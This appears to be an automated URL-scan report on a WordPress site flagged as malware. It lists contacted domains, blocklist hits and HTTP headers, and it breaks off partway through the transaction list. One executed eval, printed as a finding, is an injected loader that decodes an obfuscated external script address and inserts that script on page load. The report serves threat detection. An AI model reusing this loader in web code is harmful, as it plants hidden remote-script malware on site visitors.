Overview

URLmp48update.com/
IP 64.90.37.168 (United States)
ASN#26347 DREAMHOST-AS
UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer
Report completed2022-12-09 04:42:06 UTC
StatusLoading report..
IDS alerts0
Blocklist alert14
urlquery alerts No alerts detected
Tags None

Domain Summary (42)

Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
trck.wargaming.net (1) 0 2022-11-18 14:07:19 UTC 2022-12-08 16:44:59 UTC 92.223.23.230 Domain (wargaming.net) ranked at: 12915
googleads.g.doubleclick.net (2) 42 2012-05-21 07:15:40 UTC 2022-12-08 17:20:04 UTC 142.250.74.34
alb.reddit.com (1) 1521 2017-06-15 05:33:56 UTC 2022-12-08 17:22:49 UTC 151.101.129.140
ocsp.r2m01.amazontrust.com (1) 0 2022-10-12 20:43:53 UTC 2022-12-08 17:23:26 UTC 54.230.80.227 Domain (amazontrust.com) ranked at: 581
piushtrivedi.neocities.org (1) 0 2017-02-08 08:22:20 UTC 2022-12-02 19:09:19 UTC 198.51.233.2 Domain (neocities.org) ranked at: 84295
firefox.settings.services.mozilla.com (2) 867 2020-05-25 20:06:39 UTC 2022-12-08 17:12:32 UTC 35.241.9.150
mp48update.com (25) 0 2022-08-18 05:35:53 UTC 2022-12-08 05:55:14 UTC 64.90.37.168 Unknown ranking
push.services.mozilla.com (1) 2140 2014-10-24 08:27:06 UTC 2022-12-08 17:20:00 UTC 35.164.183.116
promo-cdn.worldofwarships.com (16) 355412 2022-02-14 08:03:08 UTC 2022-12-08 22:42:48 UTC 92.223.97.97
promo.worldofwarships.eu (1) 327898 2020-10-28 08:34:32 UTC 2022-12-08 22:42:48 UTC 92.223.97.97
adservice.google.no (1) 96969 2017-09-26 14:23:08 UTC 2022-12-08 17:12:08 UTC 142.250.74.130
q.quora.com (1) 3239 2017-05-08 19:06:57 UTC 2022-12-08 17:43:28 UTC 100.25.7.120
cwidget.crictimes.org (1) 0 2021-11-04 20:44:12 UTC 2022-11-24 15:58:34 UTC 172.67.194.188 Domain (crictimes.org) ranked at: 95947
cdn.cookielaw.org (7) 502 2013-12-28 13:20:36 UTC 2022-12-08 17:24:52 UTC 104.16.148.64
contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-12-08 17:14:01 UTC 34.117.237.239
www.googletagmanager.com (1) 75 2012-10-04 01:07:32 UTC 2022-12-08 17:14:43 UTC 172.217.21.168
ocsp.godaddy.com (1) 698 2012-05-20 19:28:57 UTC 2022-12-08 17:15:00 UTC 192.124.249.22
track.wg-aff.com (1) 124015 2019-09-30 07:03:52 UTC 2022-12-08 21:41:19 UTC 35.204.130.99
10697551.fls.doubleclick.net (1) 157761 2021-04-07 14:28:26 UTC 2022-12-08 09:03:24 UTC 142.250.74.38
geolocation.onetrust.com (1) 802 2018-02-07 11:23:41 UTC 2022-12-08 17:15:44 UTC 104.18.26.85
www.google.no (1) 25607 2012-06-26 23:22:08 UTC 2022-12-08 17:14:59 UTC 142.250.74.67
s.yimg.jp (1) 11015 2012-10-25 03:38:43 UTC 2022-12-08 18:41:42 UTC 183.79.249.124
b92.yahoo.co.jp (1) 15866 2012-10-07 00:06:28 UTC 2022-12-08 15:17:12 UTC 183.79.249.124
a.quora.com (1) 7568 2017-05-08 19:06:55 UTC 2022-12-08 16:56:23 UTC 162.159.152.17
content-signature-2.cdn.mozilla.net (1) 1152 2020-11-03 12:26:46 UTC 2022-12-08 17:21:04 UTC 34.160.144.191
ocsp.digicert.com (10) 86 2012-05-21 07:02:23 UTC 2022-12-08 17:15:52 UTC 93.184.220.29
img-getpocket.cdn.mozilla.net (7) 1631 2017-09-01 03:40:57 UTC 2022-12-08 15:50:00 UTC 34.120.237.76
ocsp.pki.goog (27) 175 2017-06-14 07:23:31 UTC 2022-12-08 17:12:01 UTC 142.250.74.131
way.specialblueitems.com (3) 0 2022-12-03 13:28:05 UTC 2022-12-08 10:53:17 UTC 159.69.234.10 Unknown ranking
bit.ly (1) 8194 2012-05-30 06:37:18 UTC 2022-12-08 17:15:02 UTC 67.199.248.11
js.interestmoments.com (1) 0 2022-11-25 06:47:30 UTC 2022-12-09 04:35:24 UTC 193.169.194.63 Unknown ranking
thirawogla.com (1) 0 2022-05-25 22:03:02 UTC 2022-12-08 05:06:01 UTC 88.85.94.246 Unknown ranking
ocsp.globalsign.com (2) 2075 2012-05-25 06:20:55 UTC 2022-12-08 17:15:03 UTC 104.18.20.226
fonts.googleapis.com (2) 8877 2012-05-23 12:41:44 UTC 2022-12-08 17:12:12 UTC 142.250.74.74
fonts.gstatic.com (7) 0 2014-04-02 10:51:04 UTC 2022-12-08 17:14:55 UTC 216.58.207.227 Domain (gstatic.com) ranked at: 540
long.interestmoments.com (2) 0 2022-11-25 08:09:45 UTC 2022-12-08 05:06:01 UTC 193.169.194.63 Unknown ranking
region1.google-analytics.com (1) 0 2022-03-17 11:26:33 UTC 2022-12-08 17:12:10 UTC 216.239.34.36 Domain (google-analytics.com) ranked at: 8401
adservice.google.com (1) 76 2017-09-26 14:24:07 UTC 2022-12-08 17:22:34 UTC 142.250.74.2
d.adroll.com (14) 1530 2012-05-20 19:08:23 UTC 2022-12-08 17:52:45 UTC 52.209.81.133
r3.o.lencr.org (18) 344 2020-12-02 08:52:13 UTC 2022-12-08 17:12:06 UTC 23.36.76.226
mc.yandex.ru (10) 2672 2012-05-21 09:38:30 UTC 2022-12-08 17:21:11 UTC 87.250.250.119
s.adroll.com (7) 2553 2012-06-27 18:27:26 UTC 2022-12-08 16:35:25 UTC 143.204.55.31

Network Intrusion Detection Systemsinfo

Suricata /w Emerging Threats Pro
 No alerts detected

Blocklists

OpenPhish
 No alerts detected

PhishTank
 No alerts detected

Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-12-09 2 mp48update.com/ Malware
2022-12-09 2 mp48update.com/wp-content/plugins/td-composer/td-multi-purpose/style.css?ve (...) Malware
2022-12-09 2 mp48update.com/wp-content/plugins/live-news/public/assets/css/general.css?v (...) Malware
2022-12-09 2 mp48update.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 Malware
2022-12-09 2 mp48update.com/wp-content/plugins/td-composer/assets/fonts/td-multipurpose/ (...) Malware
2022-12-09 2 mp48update.com/wp-includes/css/dist/block-library/style.min.css?ver=6.1.1 Malware
2022-12-09 2 mp48update.com/wp-content/plugins/td-cloud-library/assets/js/js_posts_autol (...) Malware
2022-12-09 2 mp48update.com/ Malware
2022-12-09 2 mp48update.com/wp-content/themes/Newspaper/images/icons/newspaper.woff?20 Malware
2022-12-09 2 mp48update.com/wp-content/plugins/td-composer/assets/fonts/td-multipurpose/ (...) Malware
2022-12-09 2 js.interestmoments.com/scripts/trim.js Malware
2022-12-09 2 mp48update.com/wp-content/plugins/live-news/public/assets/js/momentjs/momen (...) Malware
2022-12-09 2 mp48update.com/wp-content/plugins/td-composer/legacy/Newspaper/js/tagdiv_th (...) Malware
2022-12-09 2 mp48update.com/wp-content/themes/Newspaper/style.css?ver=11.5 Malware

mnemonic secure dns
 No alerts detected

Quad9 DNS
 No alerts detected


Files

No files detected

Recent reports on same IP/ASN/Domain/Screenshot

Last 1 reports on IP: 64.90.37.168
Date UQ / IDS / BL URL IP
2022-12-09 04:42:06 +0000 0 - 0 - 14 mp48update.com/ 64.90.37.168


Last 5 reports on ASN: DREAMHOST-AS
Date UQ / IDS / BL URL IP
2023-02-03 08:46:04 +0000 0 - 0 - 30 teachified.com/ 66.33.220.50
2023-02-03 08:36:40 +0000 0 - 2 - 0 www.bogartengineering.com/wp-content/uploads/ (...) 64.111.125.209
2023-02-03 08:26:17 +0000 0 - 0 - 5 togsfortoads.com/?password-protected=login&re (...) 208.113.160.190
2023-02-03 07:40:20 +0000 0 - 3 - 4 jwest-art.com/wp-includes/@T@/cloudlog.php 208.113.218.131
2023-02-03 05:36:25 +0000 0 - 0 - 62 www.benconry.com/about-ben 69.163.165.96


Last 1 reports on domain: mp48update.com
Date UQ / IDS / BL URL IP
2022-12-09 04:42:06 +0000 0 - 0 - 14 mp48update.com/ 64.90.37.168


Last 5 reports with similar screenshot
Date UQ / IDS / BL URL IP
2023-01-20 23:43:43 +0000 0 - 0 - 16 camilleflorence.fr/klyqyio/how-to-cover-brick (...) 213.186.33.87
2022-12-14 02:58:43 +0000 0 - 0 - 1 viajanteambulante.com.br/ 198.251.89.164
2022-12-01 09:44:54 +0000 0 - 0 - 2 babylon.krd/ 128.199.109.155
2022-12-11 08:37:43 +0000 0 - 0 - 1 bharat24news.co.in/ 88.99.56.190
2022-09-08 14:33:31 +0000 0 - 0 - 2 www1.xfxx.com/?tm=1&subid4=1662647577.0496470 (...) 99.83.136.84

JavaScript

Executed Scripts (81)

Executed Evals (2)
#1 JavaScript::Eval (size: 638) - SHA256: d6fc7c63741ee36c05d7759821175cf680a158402c9007a0162987e81283f0f5
var psdd = document.getElementsByTagName("script");
var wantmee = false;
for (var i = 0; i < psdd.length; i++) {
    if (psdd[i].id) {
        if (psdd[i].id == "slectrepoint") {
            wantmee = true;
        }
    }
}
if (wantmee == false) {
    var d = document;
    var s = d.createElement('script');
    s.id = "slectrepoint";
    s.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 114, 101, 99, 111, 114, 100, 46, 102, 105, 110, 100, 116, 114, 117, 115, 116, 99, 108, 105, 99, 107, 115, 46, 99, 111, 109, 47, 115, 116, 97, 116, 101, 46, 106, 115);
    if (document.currentScript) {
        document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
        d.getElementsByTagName('head')[0].appendChild(s);
    }
}
#2 JavaScript::Eval (size: 81) - SHA256: bed6d5a9e64eff6b2353c54d94e8d540746c00e7bc4bde27d11323060df11507
(function() {
    return google_tag_manager["GTM-58Z37MT"].macro(13).split("?")[0]
})();

Executed Writes (0)


HTTP Transactions (186)


Request Response
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "51148FED95CC00D60DC3640350F135B1B2763FF0E3CFBFFC40F0948317894BE9"
Last-Modified: Wed, 07 Dec 2022 17:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=4841
Expires: Fri, 09 Dec 2022 06:02:35 GMT
Date: Fri, 09 Dec 2022 04:41:54 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "7E210F03B140418085E94EC20C1D27D6ECF7A404CBD323E16476AE5AE95D6DAC"
Last-Modified: Wed, 07 Dec 2022 17:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2333
Expires: Fri, 09 Dec 2022 05:20:47 GMT
Date: Fri, 09 Dec 2022 04:41:54 GMT
Connection: keep-alive

                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         35.241.9.150
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: Alert, Backoff, Content-Length, Content-Type, Retry-After
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 939
via: 1.1 google
date: Fri, 09 Dec 2022 04:08:17 GMT
age: 2017
cache-control: max-age=3600,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    14cd9a0afb6ba9a763651d5112760d1e
Sha1:   75d7b104ab9ab11fbb73c3f348b43b0119b5adfa
Sha256: 4e32a117106be587ffcd63239c16a8117eb7840830d4c9decf6527761967532e
                                        
                                            GET / HTTP/1.1 
Host: mp48update.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

search
                                         64.90.37.168
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 09 Dec 2022 04:41:54 GMT
Server: Apache
Location: https://mp48update.com/
Content-Length: 231
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   231
Md5:    6c68ab73ca9c166bafebeda9e25b17bf
Sha1:   fc4a25989bec9f1a80f4c5bf07adf8921b84f7ab
Sha256: 642936c4818e77a6fe33082701eb83601119e1d8cbe5e42ae56e9b3cea446c86

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "4819229FD8F502A0C68C80BD7409E104C1B4D1A98CA8A6CD9DEBA629B1511AEA"
Last-Modified: Thu, 08 Dec 2022 23:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21393
Expires: Fri, 09 Dec 2022 10:38:27 GMT
Date: Fri, 09 Dec 2022 04:41:54 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2023-01-19-10-06-33.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         34.160.144.191
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
x-amz-id-2: AeUUgTeLubcBQMQeuu1XG92JIHADM+4dEGiPysYD4l74uhuDxvpsh+I/nTjpNAcbmGwdg1RZTOQ=
x-amz-request-id: 1M73Z5SNWRZH7X6J
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Fri, 09 Dec 2022 03:48:10 GMT
age: 3224
last-modified: Wed, 30 Nov 2022 10:06:34 GMT
etag: "53341dea33f4f3d9b4966f80589f429a"
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    53341dea33f4f3d9b4966f80589f429a
Sha1:   20f7b07c686c986d2ed1e3e9ad1bb2aef8edaf0d
Sha256: 651683e52cdbc96b289f8f123155f0b96d9f67432689e89156fa56f5a346c6a0
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Fri, 09 Dec 2022 04:41:54 GMT
content-length: 12
vary: Origin, Access-Control-Request-Method, Access-Control-Request-Headers
access-control-allow-credentials: true
access-control-expose-headers: content-type
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         35.241.9.150
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: Content-Length, Pragma, Last-Modified, ETag, Alert, Expires, Retry-After, Cache-Control, Backoff, Content-Type
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 329
via: 1.1 google
date: Fri, 09 Dec 2022 04:07:59 GMT
age: 2035
last-modified: Fri, 25 Mar 2022 17:45:46 GMT
etag: "1648230346554"
cache-control: max-age=3600,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 6569
Cache-Control: max-age=108866
Date: Fri, 09 Dec 2022 04:41:55 GMT
Etag: "6391a92c-1d7"
Expires: Sat, 10 Dec 2022 10:56:21 GMT
Last-Modified: Thu, 08 Dec 2022 09:06:52 GMT
Server: ECS (ska/F6FE)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: OlJB3rv2Dse+Q1kIY2u6zw==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

search
                                         35.164.183.116
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: fJv6wJ+3sNxJVGCiCQKVgfPYOEE=

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "F43702CD363447680D545D928F9EA6F997A770228108B4C9312999B76891BB38"
Last-Modified: Wed, 07 Dec 2022 17:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5928
Expires: Fri, 09 Dec 2022 06:20:44 GMT
Date: Fri, 09 Dec 2022 04:41:56 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "F43702CD363447680D545D928F9EA6F997A770228108B4C9312999B76891BB38"
Last-Modified: Wed, 07 Dec 2022 17:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5928
Expires: Fri, 09 Dec 2022 06:20:44 GMT
Date: Fri, 09 Dec 2022 04:41:56 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "F43702CD363447680D545D928F9EA6F997A770228108B4C9312999B76891BB38"
Last-Modified: Wed, 07 Dec 2022 17:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5928
Expires: Fri, 09 Dec 2022 06:20:44 GMT
Date: Fri, 09 Dec 2022 04:41:56 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F2654f7a6-bd8b-4c13-9c46-9b7582ba979a.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 5169
x-amzn-requestid: 277a1b04-4e19-4313-8aac-5f9ab9076305
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ctEdkFGrIAMFvHg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638eb456-5b21edd57297665012d536cc;Sampled=0
x-amzn-remapped-date: Tue, 06 Dec 2022 03:17:42 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: swNGUcNy2i0w9UGe-EJhwslE01TzTC3rrDhLhVVxHyhWMGSC1uq0mA==
via: 1.1 9c60d6224ac0b44e908b5c9dcf70e9a4.cloudfront.net (CloudFront), 1.1 b2f9564ebf9c745cc2ceae96d434977e.cloudfront.net (CloudFront), 1.1 google
date: Thu, 08 Dec 2022 07:01:14 GMT
age: 78042
etag: "ebb97e5b97f394e8c67098f55581d5329ce819a2"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   5169
Md5:    06514ce96ae21cb01f526a5febdcbeb4
Sha1:   ebb97e5b97f394e8c67098f55581d5329ce819a2
Sha256: 4099a2fb6ddc4feaa30f357a180d64aeb7c9fc73f115fc762d5fe5c221d2e89e
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F884d1162-4377-487f-a056-b21117ef5001.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8204
x-amzn-requestid: cf54b5f8-ede8-49d5-aa56-5d9de98e3ab8
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cjtKfEiToAMFSXA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638af576-6ddfe35c0b31074d6a07076f;Sampled=0
x-amzn-remapped-date: Sat, 03 Dec 2022 07:06:30 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: UfqFAlLedF6ZkfbGXhyYDcvu0porNJb6LPaeQ8p4dqWqsFD6iRgWLw==
via: 1.1 41e349e25dc4bc856d0e5d2c162428a0.cloudfront.net (CloudFront), 1.1 476c2ba6d9f6cd69dbcedbd65688cbc0.cloudfront.net (CloudFront), 1.1 google
date: Thu, 08 Dec 2022 15:50:07 GMT
age: 46309
etag: "6cee6b1828c709f68b995197ca943a5c393f86fb"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8204
Md5:    9cb76c68a8cd472600106cc118067868
Sha1:   6cee6b1828c709f68b995197ca943a5c393f86fb
Sha256: 009d9ba19043b03b5aceeb80b69bf249f19a0a225bdbfef7ab8691669cb64130
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F9f25ad59-b8ed-49ea-9611-21f63c20c8fb.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7960
x-amzn-requestid: beadd240-39d0-407d-a890-6a095657cac3
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ctEd8HC0oAMFUag=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638eb459-44d4f63c62f58684782ef14a;Sampled=0
x-amzn-remapped-date: Tue, 06 Dec 2022 03:17:45 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: yL-FrFYh-3PuCZCpCHYg--ebTS7wMmMQ7IE2mgimDVsKWFEtKC2gVQ==
via: 1.1 74aa91fe819001bcedd882694f52b436.cloudfront.net (CloudFront), 1.1 7e87179efaa9e3c316bd3d3a74cfded8.cloudfront.net (CloudFront), 1.1 google
date: Thu, 08 Dec 2022 05:44:09 GMT
age: 82667
etag: "cfb1e5bcab2148a777889680e6e36b9d7e8917ec"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7960
Md5:    eb00a2a503a690cee3e4dd729b5bc9bd
Sha1:   cfb1e5bcab2148a777889680e6e36b9d7e8917ec
